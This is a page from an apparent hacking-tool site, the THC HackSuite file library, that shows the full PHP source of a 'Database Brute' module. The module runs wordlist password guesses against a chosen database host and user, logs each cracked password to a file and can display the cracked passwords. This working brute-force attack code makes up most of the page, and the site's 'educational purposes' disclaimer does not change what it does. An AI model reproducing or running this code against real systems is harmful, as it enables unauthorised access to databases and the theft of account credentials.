THC HackSuite File Library

random gallery image

random tutorial

preview

..I will show you how to create native tools. I'm not going to make a new tool though, instead I will show you what is required to create one. You can find all the native tools in..

random vulnerability assesment

Mister LG

Mister LG can create upload forms and test targets on file upload vulnerabilities

more about this module
more of this category
more modules

HackSuite File Library

Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.


<?php

/*

Handler for Database Brute



Author: Remco Kouw

Site: http://www.hacksuite.com

Last Edit: 13-04-2015

*/

set_time_limit(0);

// set variable to be able to save a task

$_MODULE_C = "thc_db";

$_LOG = "accounts.php";

include_once("../../Includes/screen_header.php");

include_once($_PATHS['functions_root']."/scrn.php");

$sDest = $_PATHS['module_default_root']."/dbs.php";

(!IsThere($sDest) ? include_once($_PATHS['end']) : include_once($sDest));

if(isset($_POST['sDB'])){

    if(!isset($_DB[$_POST['sDB']])){

        $_CONTEXT['errors'][] = "Database type doesn't exist";

        include_once($_PATHS['end']);

    }

    $sDest = $_PATHS['module_default_root']."/".$_DB[$_POST['sDB']].".php";

    (!IsThere($sDest) ? include_once($_PATHS['end']) : include_once($sDest));

}

// options

$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";

$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";

$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";

// template for screen file output

include_once($_PATHS['style_root']."/screen.php");

if(isset($_POST['submit'])){

    switch($_POST['submit']){

        // quick validation first of the input

        case"Generate Attack":

        if($_POST['sUser']==""){

            die(Screen($sOut."No user has been specified",$_CONTEXT['verbose'],$_CONTEXT['silent']));

        }

        break;

        // View Passes

        case"View Passes":

        echo $sOut;

        if(!function_exists("RawToArray")){

            include_once($_PATHS['functions_root']."/raw_to_array.php");

        }

        if(false==($aKeys = RawToArray($_LOG))){

            echo Screen("<b id=h7>[no passwords hacked yet]</b>",$_CONTEXT['verbose'],$_CONTEXT['silent']);

        }

        else{

            for($x=0;$x<count($aKeys);$x++){

                echo Screen("<b>".date($_CONTEXT['time_pattern'].' H:i:s',$aKeys[$x][0])."</b> password for user <b>".$aKeys[$x][1]."</b> is <b>".$aKeys[$x][2]."</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);

            }

        }

        exit;

        break;

        default:

        // default template

        echo $sOut;

        echo $sOptions;

        echo $sEnd;

        exit;

    }

}

else{

    echo $sOut;

    echo $sOptions;

    echo $sEnd;

    exit;

}

$sWordlist = ExploitFilter($_PATHS['wordlists_root']."/".$_POST['sWordlist'],0,1);

if(false===($aFileData = @file($sWordlist))){

    $_CONTEXT['errors'][] = "Wordlist doesn't exist";

    include_once($_PATHS['end']);

}

include_once($_PATHS['includes_root']."/task_start.php");

echo $sOut;

echo Screen("<br>\n<b>Running..</b><p>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);

// spit fire...

flush();

ob_flush();

$bHacked = false;

$iAttempts = 0;

echo Screen("<b>trying to connect with ".strip_tags($_POST['sHost']).":</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);

flush();

ob_flush();

if(false!==($iFileData = @count($aFileData))){

    for($x=0;$x<$iFileData;$x++){

        $sPass = trim($aFileData[$x]);

        $iAttempts++;

        if(@ConnectDB($_POST['sHost'],$_POST['sUser'],$sPass,$_POST['iPort'])){

            echo Screen("[".date('H:i:s',time())."] attempt ".$iAttempts.": <b id=h6>hacked:</b> password is ".$sPass."\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);

            if($_CONTEXT['log']==true){

                WriteF($_LOG,time()."|".$_POST['sUser']."|".$sPass."\n");

            }

            $bHacked = true;

            ob_flush();

            flush();

            break;

        }

        else{

            echo Screen("[".date('H:i:s',time())."] attempt ".$iAttempts.": $sPass =&gt; <b id=h7>failed</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);

            ob_flush();

            flush();

        }

    }

}

else{

    echo Screen("No data in wordlist",$_CONTEXT['verbose'],$_CONTEXT['silent']);

}

// update entry in background task file

$sHacked = ($bHacked ? "successfully got password after ".$iAttempts." attempts in ".(time()-$_CONTEXT['start_task'])."(s)" : "failed to get password, please try some different wordlist");

echo Screen($sHacked,$_CONTEXT['verbose'],$_CONTEXT['silent']);

include_once($_PATHS['includes_root']."/task_end.php");

echo $sEnd;

?>

[ back ]

site stats

cms statistics:

version: 0.6.0
downloads: 4384
native: 26
modules: 21
apps: 2

support development

It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!

disclaimer

We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!

site resources

remote resources

partners and friends

Created by Remco Kouw. Powered by protein shakes and a high calorie diet.